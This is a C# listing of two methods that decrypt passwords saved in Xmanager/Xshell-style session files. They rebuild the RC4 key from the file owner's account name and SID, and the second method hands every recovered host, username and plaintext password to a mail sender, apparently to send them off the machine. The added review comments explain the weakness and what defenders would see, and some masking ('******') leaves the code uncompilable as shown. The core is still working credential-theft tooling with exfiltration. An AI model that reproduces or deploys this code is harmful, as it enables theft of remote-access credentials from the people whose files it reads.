/// <summary>
/// Reads one session file, extracts its connection fields and, when a stored
/// password is present, decrypts it and prints every field to the console.
/// </summary>
/// <param name="path">Session file to read; loaded in full with File.ReadAllText.</param>
/// <param name="UserSid">
/// String whose ASCII bytes are hashed with SHA-256 to form the RC4 key. The caller
/// decides what it contains; the output labels it "UserSid(Key)".
/// </param>
/// <remarks>
/// Review notes:
/// - The key is derived only from <paramref name="UserSid"/>. No secret typed by the
///   user takes part, so read access to the session file plus knowledge of that
///   string is enough to recover the stored password. Session files of this kind
///   should be treated as holding recoverable credentials: keep their ACLs tight and
///   prefer key-based authentication or the client's master-password option, if it
///   has one.
/// - The "******" runs inside the two MidStrEx calls are not valid C#. They look like
///   masking applied by the page this listing came from, so the block does not
///   compile as shown.
/// - MidStrEx and RC4 are defined outside this block; presumably MidStrEx returns the
///   text between two markers. Confirm against their definitions.
/// </remarks>
public void Xmangager(string path, string UserSid)
{
    string sourse = File.ReadAllText(path);

    // Field extraction. Each call passes a start marker and "\r\n" as the end marker.
    string arg = MidStrEx(sourse, "Host=", "\r\n");
    string arg2 = MidStrEx(sourse, "[CONNECTION]\r\nPort=", "\r\n");
    string arg3 = MidStrEx(sourse, "UserName="******"\r\n");
    string text = MidStrEx(sourse, "Password="******"\r\n");
    string arg4 = MidStrEx(sourse, "[SessionInfo]\r\nVersion=", "\r\n");

    // Nothing is printed at all when the file carries no stored password.
    if (text != null && text != "")
    {
        byte[] array = Convert.FromBase64String(text);

        // Key = SHA-256 over the ASCII bytes of the caller-supplied string.
        byte[] pwd = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(UserSid));

        // The last 32 bytes of the decoded blob are dropped and never inspected here;
        // presumably a checksum or tag - confirm against the file format.
        byte[] array2 = new byte[array.Length - 32];
        Array.Copy(array, 0, array2, 0, array.Length - 32);
        byte[] bytes = RC4.Decrypt(pwd, array2);

        Console.WriteLine("[+] Session File:" + path);
        Console.WriteLine(" Host: {0}", arg);
        Console.WriteLine(" Port: {0}", arg2);
        Console.WriteLine(" UserName: {0}", arg3);
        Console.WriteLine(" Version: {0}", arg4);
        // "Password" is the still-encoded value from the file; "Decrypt" below is the plaintext.
        Console.WriteLine(" Password: {0}", text);
        Console.WriteLine(" UserSid(Key): {0}", UserSid);
        // From here on stdout carries the plaintext credential, so anything that
        // captures console output (logs, transcripts) retains it.
        Console.WriteLine(" Decrypt: {0}", Encoding.ASCII.GetString(bytes));
    }
}
/// <summary>
/// Walks every session file returned by XmangagerCrypt.checkPath(), rebuilds the
/// decryption key from the file owner's account name and SID, decrypts the stored
/// password, and passes the collected results to SendMail.Send.
/// </summary>
/// <remarks>
/// Review notes:
/// - The method takes no input and needs no user interaction. Everything the key is
///   built from (owner name, owner SID) is read from the file's security descriptor
///   and the WinNT ADSI provider, so whoever can read the file can recover the
///   stored password.
/// - The results leave the host through SendMail.Send (defined elsewhere; by its
///   name it mails the buffer - confirm). For defenders the visible sequence is: one
///   process enumerates session files, reads their owner, queries objectSid through
///   "WinNT://", then hands data to a mail sender.
/// - Several "******" runs below are not valid C# and look like masking applied by
///   the page this listing came from. The block does not compile as shown.
/// - XmangagerCrypt.checkPath, XmangagerCrypt.ConvertByteToStringSid, RC4 and
///   SendMail are not visible here; their behaviour is assumed from names only.
/// </remarks>
public static void XmangagerPwd()
{
    List <string> xsh_pathlist = XmangagerCrypt.checkPath();
    StringBuilder strbuf = new StringBuilder();
    foreach (string path in xsh_pathlist)
    {
        // Resolve the file owner as an NT account name from the file's ACL.
        FileInfo fileInfo = new FileInfo(path);
        FileSecurity fileSecurity = fileInfo.GetAccessControl();
        IdentityReference identityReference = fileSecurity.GetOwner(typeof(NTAccount));

        // Keep the part after '\' (DOMAIN\user), falling back to the part after '@'.
        // With neither separator idx stays -1 and Substring(0) keeps the whole value.
        int idx = identityReference.Value.IndexOf('\\');
        if (idx == -1)
        {
            idx = identityReference.Value.IndexOf('@');
        }
        string userName = identityReference.Value.Substring(idx + 1);
        string userSid = null;
        try
        {
            // Look the owner up through the WinNT ADSI provider to read its binary SID.
            DirectoryEntry obDirEntry = new DirectoryEntry("WinNT://" + identityReference.Value.Replace(@"\", @"/"));
            PropertyCollection coll = obDirEntry.Properties;
            object obVal = coll["objectSid"].Value;
            // Get the owner's SID; the key material is the account name followed by the string SID.
            userSid = userName + XmangagerCrypt.ConvertByteToStringSid((Byte[])obVal);
        }
        catch (System.Runtime.InteropServices.COMException)
        {
            // Owner lookup failed: this file is skipped without any record of it.
            continue;
        }
        using (StreamReader sr = new StreamReader(path))
        {
            string Host = "null";
            // NOTE(review): the "******" defaults are what the listing shows; they may be
            // page masking rather than the author's original values - not verifiable here.
            string UserName = "******";
            string password = "******";
            string rawPass;
            string pattern = @"Password=(.*?)";
            while ((rawPass = sr.ReadLine()) != null)
            {
                // The lazy group (.*?) can match the empty string, so each IsMatch below is
                // true for any line that contains the literal prefix anywhere.
                if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, @"Host=(.*?)"))
                {
                    Host = rawPass.Replace("Host=", "");
                }
                if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, pattern))
                {
                    rawPass = rawPass.Replace("Password="******"");
                    if (rawPass.Equals(""))
                    {
                        // Empty password field: move on to the next line of the file.
                        continue;
                    }
                    byte[] data = Convert.FromBase64String(rawPass);
                    // Key = SHA-256 over the ASCII bytes of "<owner name><owner SID>".
                    byte[] Key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(userSid));
                    // The trailing 0x20 bytes of the blob are dropped and never inspected here;
                    // presumably a checksum or tag - confirm against the file format.
                    byte[] passData = new byte[data.Length - 0x20];
                    Array.Copy(data, 0, passData, 0, data.Length - 0x20);
                    byte[] decrypted = RC4.Decrypt(Key, passData);
                    password = Encoding.ASCII.GetString(decrypted);
                }
                if (System.Text.RegularExpressions.Regex.IsMatch(rawPass, @"UserName=(.*?)"))
                {
                    UserName = rawPass.Replace("UserName="******"");
                }
            }
            // One entry per session file; from here the buffer holds plaintext credentials.
            strbuf.Append("Host: " + Host + " UserName: "******" Decrypt: " + password);
        }
        strbuf.Append(Environment.NewLine);
    }
    // The whole buffer is handed to the mail helper once, after every file has been processed.
    SendMail.Send(strbuf);
}